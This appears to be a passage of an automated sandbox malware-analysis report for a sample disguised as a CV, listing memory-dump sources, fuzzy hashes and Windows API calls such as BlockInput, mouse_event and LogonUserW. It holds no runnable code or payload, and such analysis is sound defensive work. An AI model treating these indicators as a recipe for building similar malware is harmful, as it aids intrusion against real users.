                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ad43d3dbd0a9a17bde1dc96a857954b583296269e56ee705b0ad93557c24a3ce
                                                                                            • Instruction ID: 4d1d128b5b8067ba8f1d92dbb42bc2234de18d23e64b9e077dbf54d088aec46e
                                                                                            • Opcode Fuzzy Hash: ad43d3dbd0a9a17bde1dc96a857954b583296269e56ee705b0ad93557c24a3ce
                                                                                            • Instruction Fuzzy Hash: B7B1C020D2AF418DD72396398831337B65D6FBB2D6B91D71BFC2A78D62EB2195C34180
                                                                                            APIs
                                                                                            • __time64.LIBCMT ref: 0010B6DF
                                                                                              • Part of subcall function 000E344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0010BDC3,00000000,?,?,?,?,0010BF70,00000000,?), ref: 000E3453
                                                                                              • Part of subcall function 000E344A: __aulldiv.LIBCMT ref: 000E3473
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                            • String ID:
                                                                                            • API String ID: 2893107130-0
                                                                                            • Opcode ID: ad018128055e4352396deab026a008ecc7a405bbfd9330f8fa6f259ff379860f
                                                                                            • Instruction ID: b56856f19267cb0da9b45667e2dc986540b425ee1fa11832b010ad37a34aa62c
                                                                                            • Opcode Fuzzy Hash: ad018128055e4352396deab026a008ecc7a405bbfd9330f8fa6f259ff379860f
                                                                                            • Instruction Fuzzy Hash: F421B172634610CBC729CF38C881A96B7E1EB95710B288E7DE4E5CB2C0CB74BA45CB54
                                                                                            APIs
                                                                                            • BlockInput.USER32(00000001), ref: 00116ACA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BlockInput
                                                                                            • String ID:
                                                                                            • API String ID: 3456056419-0
                                                                                            • Opcode ID: 7bddd10a484ec08634b932f13165753febb8fa253c2671fc17bd3f066f31593a
                                                                                            • Instruction ID: ed04ca8e79d27f85c67684c4f25c0e1bc2e1f151e407fdf5eb1afbab6f086a1e
                                                                                            • Opcode Fuzzy Hash: 7bddd10a484ec08634b932f13165753febb8fa253c2671fc17bd3f066f31593a
                                                                                            • Instruction Fuzzy Hash: EFE01236210204AFC704EB59E804E9AB7ECAF74751B058426E945D7291DAB1E8448BA0
                                                                                            APIs
                                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001074DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: mouse_event
                                                                                            • String ID:
                                                                                            • API String ID: 2434400541-0
                                                                                            • Opcode ID: a9ccb170999f75c5d0f84532e6952e59fb38a58038ded75dc35ef6de3bf74224
                                                                                            • Instruction ID: f93f6ae192de8e6692799585c19b79a0b69a0dbc4122c915a0d2e5fb2a35bd06
                                                                                            • Opcode Fuzzy Hash: a9ccb170999f75c5d0f84532e6952e59fb38a58038ded75dc35ef6de3bf74224
                                                                                            • Instruction Fuzzy Hash: 01D05EB4E2C30538EC2D27249C0FF760908F3007C0F818189B0C2C94C1BAD07C419032
                                                                                            APIs
                                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,000FAD3E), ref: 000FB124
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LogonUser
                                                                                            • String ID:
                                                                                            • API String ID: 1244722697-0
                                                                                            • Opcode ID: 51b8faaf64413993683e64a562b9e009780c636d30adf4f63e6d47fc23cf7f92
                                                                                            • Instruction ID: 1cf4f6e014d41a3ddee52e8892d850c0780cf56ae908af4f7d0ab65e0fc1030d
                                                                                            • Opcode Fuzzy Hash: 51b8faaf64413993683e64a562b9e009780c636d30adf4f63e6d47fc23cf7f92
                                                                                            • Instruction Fuzzy Hash: 31D05E321A460EAEDF024FA4EC02EAE3F6AEB04700F408110FA15C60A0C671D531AB50
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: NameUser
                                                                                            • String ID:
                                                                                            • API String ID: 2645101109-0
                                                                                            • Opcode ID: 586032079dfdb6b7a5fc84514169553179a04b69c743aab7f4c620d1cd68238e
                                                                                            • Instruction ID: 977a9ee83e8f9de64eb451cd4e8c19c8fa8f71cfe891cfc7d37e6c5a10bb4721
                                                                                            • Opcode Fuzzy Hash: 586032079dfdb6b7a5fc84514169553179a04b69c743aab7f4c620d1cd68238e
                                                                                            • Instruction Fuzzy Hash: 69C04CB1400109DFCB55CBD0D9449EEB7BCAB04301F105091A145F2110D7749B859B72
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 000E818F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 9f7fad9f5eff53ff13a82057dba35ec26f5762f0703a6f4b377f8237642a9b86
                                                                                            • Instruction ID: 99ee08dbda1f2f1e9ba8427e6944e2f430245359170a380d3410c942f7e80782
                                                                                            • Opcode Fuzzy Hash: 9f7fad9f5eff53ff13a82057dba35ec26f5762f0703a6f4b377f8237642a9b86
                                                                                            • Instruction Fuzzy Hash: 3FA0223000020CFBCF002F82FC0A8883FACFB022A0B000020F80C00830CB33A8A08AE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 46d0c26a90ed1cd8e4745fc0f1a0037bd4874a4ff59d11b5a0e3ce3bbc0f5368
                                                                                            • Instruction ID: c14875e7424cbee20625bfa15521521d53e791e0361d0e84f170e8df710a807f
                                                                                            • Opcode Fuzzy Hash: 46d0c26a90ed1cd8e4745fc0f1a0037bd4874a4ff59d11b5a0e3ce3bbc0f5368
                                                                                            • Instruction Fuzzy Hash: A5227CB0A042468FDB24DF58C490BBEB7F0FF14314F14816EE94A9B392E735A985CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 347f6c2a3afa5a030b41820effed00bd90bec787e321b466065ca03353fa996a
                                                                                            • Instruction ID: c8fd386ab66fc0c115cd14aa97e059c2a2a78e89dfa2d4d908ec4cca6e474504
                                                                                            • Opcode Fuzzy Hash: 347f6c2a3afa5a030b41820effed00bd90bec787e321b466065ca03353fa996a
                                                                                            • Instruction Fuzzy Hash: 9C126B70A00609DFDF14DFA5D985AEEB7F5FF48300F208569E806E7291EB36A951CB60
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                            • String ID:
                                                                                            • API String ID: 3728558374-0
                                                                                            • Opcode ID: 6a6582584090dbfc45e20da28eb2e4bcfd4b8a180eb530f82b01f9b1fa5c1175
                                                                                            • Instruction ID: 91be356785044455e520f0ff9119248e49014eab9d5980fb4cb5bfb6fc9c7f47
                                                                                            • Opcode Fuzzy Hash: 6a6582584090dbfc45e20da28eb2e4bcfd4b8a180eb530f82b01f9b1fa5c1175
                                                                                            • Instruction Fuzzy Hash: A6029270A00209DFDF14EF68D991BAEB7B5FF44300F248069E806EB296EB35D955CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                            • Instruction ID: d7edda1b941816a72a340a11fddbf7a7f284652dc9a2d81de364946ad51001d5
                                                                                            • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                                            • Instruction Fuzzy Hash: C8C1D1722051E30EDFAD463A843443EBBE15BA2BB131A476ED8B3DB5D1EF60C564D620
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                            • Instruction ID: 3072c13cc285e96b49440ee2e16e7844b49eb11ebccaebea56a9ed766acb219c
                                                                                            • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                                            • Instruction Fuzzy Hash: B7C1A2322092E30DDBAD463A943443EBBE15BA2BB131A476ED4F3DB5D5EF20C564D620
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                            • Instruction ID: fd00aa6d8b1bb7144e41807e5dad87db036813690869430bfd222b3401163abb
                                                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                            • Instruction Fuzzy Hash: 07C190322052A309DBAD4639943443EBBE15BA2BB131A977FD4B3CB6D5EF20C564D630
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(00000000), ref: 0011A2FE
                                                                                            • DeleteObject.GDI32(00000000), ref: 0011A310
                                                                                            • DestroyWindow.USER32 ref: 0011A31E
                                                                                            • GetDesktopWindow.USER32 ref: 0011A338
                                                                                            • GetWindowRect.USER32(00000000), ref: 0011A33F
                                                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0011A480
                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0011A490
                                                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A4D8
                                                                                            • GetClientRect.USER32(00000000,?), ref: 0011A4E4
                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0011A51E
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A540
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A553
                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A55E
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0011A567
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A576
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0011A57F
                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A586
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0011A591
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A5A3
                                                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0014D9BC,00000000), ref: 0011A5B9
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0011A5C9
                                                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0011A5EF
                                                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0011A60E
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A630
                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A81D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                            • API String ID: 2211948467-2373415609
                                                                                            • Opcode ID: c9b7bba8a1b1a8a793648d5acedef7432637fd1a62115e21a01e882fd9671ec8
                                                                                            • Instruction ID: 5de9d35d4722fd3a406bb8367f1b42ea9bdc43155a6773483cd609216884f97c
                                                                                            • Opcode Fuzzy Hash: c9b7bba8a1b1a8a793648d5acedef7432637fd1a62115e21a01e882fd9671ec8
                                                                                            • Instruction Fuzzy Hash: B7029C75A00204EFDB14DFA4DD89EAE7BB9FF49310F048129F915AB2A1C770AD81CB61
                                                                                            APIs
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0012D2DB
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0012D30C
                                                                                            • GetSysColor.USER32(0000000F), ref: 0012D318
                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 0012D332
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0012D341
                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0012D36C
                                                                                            • GetSysColor.USER32(00000010), ref: 0012D374
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 0012D37B
                                                                                            • FrameRect.USER32(?,?,00000000), ref: 0012D38A
                                                                                            • DeleteObject.GDI32(00000000), ref: 0012D391
                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0012D3DC
                                                                                            • FillRect.USER32(?,?,00000000), ref: 0012D40E
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0012D439
                                                                                              • Part of subcall function 0012D575: GetSysColor.USER32(00000012), ref: 0012D5AE
                                                                                              • Part of subcall function 0012D575: SetTextColor.GDI32(?,?), ref: 0012D5B2
                                                                                              • Part of subcall function 0012D575: GetSysColorBrush.USER32(0000000F), ref: 0012D5C8
                                                                                              • Part of subcall function 0012D575: GetSysColor.USER32(0000000F), ref: 0012D5D3
                                                                                              • Part of subcall function 0012D575: GetSysColor.USER32(00000011), ref: 0012D5F0
                                                                                              • Part of subcall function 0012D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0012D5FE
                                                                                              • Part of subcall function 0012D575: SelectObject.GDI32(?,00000000), ref: 0012D60F
                                                                                              • Part of subcall function 0012D575: SetBkColor.GDI32(?,00000000), ref: 0012D618
                                                                                              • Part of subcall function 0012D575: SelectObject.GDI32(?,?), ref: 0012D625
                                                                                              • Part of subcall function 0012D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0012D644
                                                                                              • Part of subcall function 0012D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0012D65B
                                                                                              • Part of subcall function 0012D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0012D670
                                                                                              • Part of subcall function 0012D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0012D698
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                            • String ID:
                                                                                            • API String ID: 3521893082-0
                                                                                            • Opcode ID: 8284a80d54193df220017be06f170ed74746a425349ceaa31cae95726b7f69ec
                                                                                            • Instruction ID: 5c657cf0428a85f61fe0d5dd3273995bb741238e7e23502f7ec1be489e177b8b
                                                                                            • Opcode Fuzzy Hash: 8284a80d54193df220017be06f170ed74746a425349ceaa31cae95726b7f69ec
                                                                                            • Instruction Fuzzy Hash: 56919FB6408311BFDB119F64FC08A6B7BB9FF86725F100A19F962965E0CB70D984CB52
                                                                                            APIs
                                                                                            • DestroyWindow.USER32 ref: 000DB98B
                                                                                            • DeleteObject.GDI32(00000000), ref: 000DB9CD
                                                                                            • DeleteObject.GDI32(00000000), ref: 000DB9D8
                                                                                            • DestroyIcon.USER32(00000000), ref: 000DB9E3
                                                                                            • DestroyWindow.USER32(00000000), ref: 000DB9EE
                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0013D2AA
                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0013D2E3
                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0013D711
                                                                                              • Part of subcall function 000DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000DB759,?,00000000,?,?,?,?,000DB72B,00000000,?), ref: 000DBA58
                                                                                            • SendMessageW.USER32 ref: 0013D758
                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0013D76F
                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0013D785
                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0013D790
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
